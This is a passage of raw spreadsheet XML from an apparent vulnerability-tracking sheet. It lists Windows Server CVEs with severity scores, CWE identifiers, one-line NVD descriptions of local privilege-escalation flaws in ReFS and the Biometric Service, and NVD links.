r="L674" s="5" t="inlineStr" /><c r="M674" s="5" t="inlineStr" /><c r="N674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P674" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q674" s="5" t="inlineStr" /><c r="R674" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S674" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T674" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t></is></c></row><row r="675"><c r="A675" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C675" s="5" t="inlineStr"><is><t>CVE-2026-83954</t></is></c><c r="D675" s="5" t="n"><v>7.8</v></c><c r="E675" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F675" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G675" s="5" t="inlineStr" /><c r="H675" s="5" t="n"><v>0.003</v></c><c r="I675" s="5" t="inlineStr" /><c r="J675" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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5" s="5" t="inlineStr" /><c r="M675" s="5" t="inlineStr" /><c r="N675" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P675" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q675" s="5" t="inlineStr" /><c r="R675" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S675" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T675" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t></is></c></row><row r="676"><c r="A676" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C676" s="5" t="inlineStr"><is><t>CVE-2026-83955</t></is></c><c r="D676" s="5" t="n"><v>7.8</v></c><c r="E676" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F676" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G676" s="5" t="inlineStr" /><c r="H676" s="5" t="n"><v>0.002</v></c><c r="I676" s="5" t="inlineStr" /><c r="J676" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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6" s="5" t="inlineStr" /><c r="M676" s="5" t="inlineStr" /><c r="N676" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P676" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q676" s="5" t="inlineStr" /><c r="R676" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S676" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T676" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t></is></c></row><row r="677"><c r="A677" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C677" s="5" t="inlineStr"><is><t>CVE-2026-83967</t></is></c><c r="D677" s="5" t="n"><v>7.8</v></c><c r="E677" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F677" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G677" s="5" t="inlineStr" /><c r="H677" s="5" t="n"><v>0.003</v></c><c r="I677" s="5" t="inlineStr" /><c r="J677" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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7" s="5" t="inlineStr" /><c r="M677" s="5" t="inlineStr" /><c r="N677" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P677" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q677" s="5" t="inlineStr" /><c r="R677" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S677" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T677" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t></is></c></row><row r="678"><c r="A678" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C678" s="5" t="inlineStr"><is><t>CVE-2026-83968</t></is></c><c r="D678" s="5" t="n"><v>7.8</v></c><c r="E678" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F678" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G678" s="5" t="inlineStr" /><c r="H678" s="5" t="n"><v>0.003</v></c><c r="I678" s="5" t="inlineStr" /><c r="J678" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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8" s="5" t="inlineStr" /><c r="M678" s="5" t="inlineStr" /><c r="N678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P678" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q678" s="5" t="inlineStr" /><c r="R678" s="5" t="inlineStr"><is><t>CWE-400, CWE-416</t></is></c><c r="S678" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T678" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t></is></c></row><row r="679"><c r="A679" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C679" s="5" t="inlineStr"><is><t>CVE-2026-83969</t></is></c><c r="D679" s="5" t="n"><v>7.8</v></c><c r="E679" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F679" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G679" s="5" t="inlineStr" /><c r="H679" s="5" t="n"><v>0.002</v></c><c r="I679" s="5" t="inlineStr" /><c r="J679" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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9" s="5" t="inlineStr" /><c r="M679" s="5" t="inlineStr" /><c r="N679" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P679" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q679" s="5" t="inlineStr" /><c r="R679" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S679" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T679" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t></is></c></row><row r="680"><c r="A680" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B680" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C680" s="5" t="inlineStr"><is><t>CVE-2026-83970</t></is></c><c r="D680" s="5" t="n"><v>7.8</v></c><c r="E680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F680" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G680" s="5" t="inlineStr" /><c r="H680" s="5" t="n"><v>0.003</v></c><c r="I680" s="5" t="inlineStr" /><c r="J680" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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0" s="5" t="inlineStr" /><c r="M680" s="5" t="inlineStr" /><c r="N680" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O680" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P680" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q680" s="5" t="inlineStr" /><c r="R680" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S680" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t></is></c></row><row r="681"><c r="A681" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B681" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C681" s="5" t="inlineStr"><is><t>CVE-2026-83971</t></is></c><c r="D681" s="5" t="n"><v>7.8</v></c><c r="E681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F681" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G681" s="5" t="inlineStr" /><c r="H681" s="5" t="n"><v>0.003</v></c><c r="I681" s="5" t="inlineStr" /><c r="J681" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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1" s="5" t="inlineStr" /><c r="M681" s="5" t="inlineStr" /><c r="N681" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O681" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P681" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q681" s="5" t="inlineStr" /><c r="R681" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S681" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t></is></c></row><row r="682"><c r="A682" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B682" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C682" s="5" t="inlineStr"><is><t>CVE-2026-83972</t></is></c><c r="D682" s="5" t="n"><v>7.8</v></c><c r="E682" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F682" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G682" s="5" t="inlineStr" /><c r="H682" s="5" t="n"><v>0.003</v></c><c r="I682" s="5" t="inlineStr" /><c r="J682" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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2" s="5" t="inlineStr" /><c r="M682" s="5" t="inlineStr" /><c r="N682" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O682" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P682" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q682" s="5" t="inlineStr" /><c r="R682" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S682" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t></is></c></row><row r="683"><c r="A683" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B683" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C683" s="5" t="inlineStr"><is><t>CVE-2026-83973</t></is></c><c r="D683" s="5" t="n"><v>7.8</v></c><c r="E683" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F683" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G683" s="5" t="inlineStr" /><c r="H683" s="5" t="n"><v>0.003</v></c><c r="I683" s="5" t="inlineStr" /><c r="J683" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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3" s="5" t="inlineStr" /><c r="M683" s="5" t="inlineStr" /><c r="N683" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O683" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P683" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q683" s="5" t="inlineStr" /><c r="R683" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S683" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t></is></c></row><row r="684"><c r="A684" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B684" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C684" s="5" t="inlineStr"><is><t>CVE-2026-83974</t></is></c><c r="D684" s="5" t="n"><v>7.8</v></c><c r="E684" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F684" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G684" s="5" t="inlineStr" /><c r="H684" s="5" t="n"><v>0.002</v></c><c r="I684" s="5" t="inlineStr" /><c r="J684" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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4" s="5" t="inlineStr" /><c r="M684" s="5" t="inlineStr" /><c r="N684" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O684" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P684" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q684" s="5" t="inlineStr" /><c r="R684" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S684" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t></is></c></row><row r="685"><c r="A685" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B685" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C685" s="5" t="inlineStr"><is><t>CVE-2026-83975</t></is></c><c r="D685" s="5" t="n"><v>7.8</v></c><c r="E685" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F685" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G685" s="5" t="inlineStr" /><c r="H685" s="5" t="n"><v>0.003</v></c><c r="I685" s="5" t="inlineStr" /><c r="J685" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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5" s="5" t="inlineStr" /><c r="M685" s="5" t="inlineStr" /><c r="N685" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O685" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P685" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q685" s="5" t="inlineStr" /><c r="R685" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S685" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t></is></c></row><row r="686"><c r="A686" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B686" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C686" s="5" t="inlineStr"><is><t>CVE-2026-83976</t></is></c><c r="D686" s="5" t="n"><v>7.8</v></c><c r="E686" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F686" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G686" s="5" t="inlineStr" /><c r="H686" s="5" t="n"><v>0.002</v></c><c r="I686" s="5" t="inlineStr" /><c r="J686" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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6" s="5" t="inlineStr" /><c r="M686" s="5" t="inlineStr" /><c r="N686" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O686" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P686" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q686" s="5" t="inlineStr" /><c r="R686" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S686" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T686" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83976</t></is></c></row><row r="687"><c r="A687" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B687" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C687" s="5" t="inlineStr"><is><t>CVE-2026-83977</t></is></c><c r="D687" s="5" t="n"><v>7.8</v></c><c r="E687" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F687" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G687" s="5" t="inlineStr" /><c r="H687" s="5" t="n"><v>0.003</v></c><c r="I687" s="5" t="inlineStr" /><c r="J687" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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7" s="5" t="inlineStr" /><c r="M687" s="5" t="inlineStr" /><c r="N687" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O687" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P687" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q687" s="5" t="inlineStr" /><c r="R687" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S687" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T687" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t></is></c></row><row r="688"><c r="A688" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B688" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C688" s="5" t="inlineStr"><is><t>CVE-2026-83978</t></is></c><c r="D688" s="5" t="n"><v>7.8</v></c><c r="E688" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F688" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G688" s="5" t="inlineStr" /><c r="H688" s="5" t="n"><v>0.003</v></c><c r="I688" s="5" t="inlineStr" /><c r="J688" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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8" s="5" t="inlineStr" /><c r="M688" s="5" t="inlineStr" /><c r="N688" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O688" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P688" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q688" s="5" t="inlineStr" /><c r="R688" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S688" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T688" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t></is></c></row><row r="689"><c r="A689" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B689" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C689" s="5" t="inlineStr"><is><t>CVE-2026-83979</t></is></c><c r="D689" s="5" t="n"><v>7.8</v></c><c r="E689" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F689" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G689" s="5" t="inlineStr" /><c r="H689" s="5" t="n"><v>0.003</v></c><c r="I689" s="5" t="inlineStr" /><c r="J689" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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9" s="5" t="inlineStr" /><c r="M689" s="5" t="inlineStr" /><c r="N689" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O689" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P689" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q689" s="5" t="inlineStr" /><c r="R689" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S689" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T689" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t></is></c></row><row r="690"><c r="A690" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B690" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C690" s="5" t="inlineStr"><is><t>CVE-2026-83980</t></is></c><c r="D690" s="5" t="n"><v>7.8</v></c><c r="E690" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F690" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G690" s="5" t="inlineStr" /><c r="H690" s="5" t="n"><v>0.003</v></c><c r="I690" s="5" t="inlineStr" /><c r="J690" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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0" s="5" t="inlineStr" /><c r="M690" s="5" t="inlineStr" /><c r="N690" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O690" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P690" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q690" s="5" t="inlineStr" /><c r="R690" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S690" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T690" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t></is></c></row><row r="691"><c r="A691" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B691" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C691" s="5" t="inlineStr"><is><t>CVE-2026-83981</t></is></c><c r="D691" s="5" t="n"><v>7.8</v></c><c r="E691" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F691" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G691" s="5" t="inlineStr" /><c r="H691" s="5" t="n"><v>0.003</v></c><c r="I691" s="5" t="inlineStr" /><c r="J691" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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1" s="5" t="inlineStr" /><c r="M691" s="5" t="inlineStr" /><c r="N691" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O691" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P691" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q691" s="5" t="inlineStr" /><c r="R691" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S691" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T691" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t></is></c></row><row r="692"><c r="A692" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B692" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C692" s="5" t="inlineStr"><is><t>CVE-2026-83982</t></is></c><c r="D692" s="5" t="n"><v>7.8</v></c><c r="E692" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F692" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G692" s="5" t="inlineStr" /><c r="H692" s="5" t="n"><v>0.003</v></c><c r="I692" s="5" t="inlineStr" /><c r="J692" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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2" s="5" t="inlineStr" /><c r="M692" s="5" t="inlineStr" /><c r="N692" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O692" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P692" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q692" s="5" t="inlineStr" /><c r="R692" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S692" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T692" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t></is></c></row><row r="693"><c r="A693" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B693" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C693" s="5" t="inlineStr"><is><t>CVE-2026-83983</t></is></c><c r="D693" s="5" t="n"><v>7.8</v></c><c r="E693" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F693" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G693" s="5" t="inlineStr" /><c r="H693" s="5" t="n"><v>0.003</v></c><c r="I693" s="5" t="inlineStr" /><c r="J693" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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3" s="5" t="inlineStr" /><c r="M693" s="5" t="inlineStr" /><c r="N693" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O693" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P693" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q693" s="5" t="inlineStr" /><c r="R693" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S693" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T693" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t></is></c></row><row r="694"><c r="A694" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B694" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C694" s="5" t="inlineStr"><is><t>CVE-2026-83985</t></is></c><c r="D694" s="5" t="n"><v>7.8</v></c><c r="E694" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F694" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G694" s="5" t="inlineStr" /><c r="H694" s="5" t="n"><v>0.003</v></c><c r="I694" s="5" t="inlineStr" /><c r="J694" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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4" s="5" t="inlineStr" /><c r="M694" s="5" t="inlineStr" /><c r="N694" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O694" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P694" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q694" s="5" t="inlineStr" /><c r="R694" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S694" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T694" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t></is></c></row><row r="695"><c r="A695" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B695" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C695" s="5" t="inlineStr"><is><t>CVE-2026-83986</t></is></c><c r="D695" s="5" t="n"><v>7.8</v></c><c r="E695" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F695" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G695" s="5" t="inlineStr" /><c r="H695" s="5" t="n"><v>0.003</v></c><c r="I695" s="5" t="inlineStr" /><c r="J695" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K69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5" s="5" t="inlineStr" /><c r="M695" s="5" t="inlineStr" /><c r="N695" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O695" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P695" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q695" s="5" t="inlineStr" /><c r="R695" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S695" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T695" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t></is></c></row><row r="696"><c r="A696" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B696" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C696" s="5" t="inlineStr"><is><t>CVE-2026-83987</t></is></c><c r="D696" s="5" t="n"><v>7.8</v></c><c r="E696" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F696" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G696" s="5" t="inlineStr" /><c r="H696" s="5" t="n"><v>0.003</v></c><c r="I696" s="5" t="inlineStr" /><c r="J696" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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6" s="5" t="inlineStr" /><c r="M696" s="5" t="inlineStr" /><c r="N696" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O696" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P696" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q696" s="5" t="inlineStr" /><c r="R696" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S696" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T696" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t></is></c></row><row r="697"><c r="A697" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B697" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C697" s="5" t="inlineStr"><is><t>CVE-2026-83988</t></is></c><c r="D697" s="5" t="n"><v>7.8</v></c><c r="E697" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F697" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G697" s="5" t="inlineStr" /><c r="H697" s="5" t="n"><v>0.003</v></c><c r="I697" s="5" t="inlineStr" /><c r="J697" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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7" s="5" t="inlineStr" /><c r="M697" s="5" t="inlineStr" /><c r="N697" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O697" s="5" 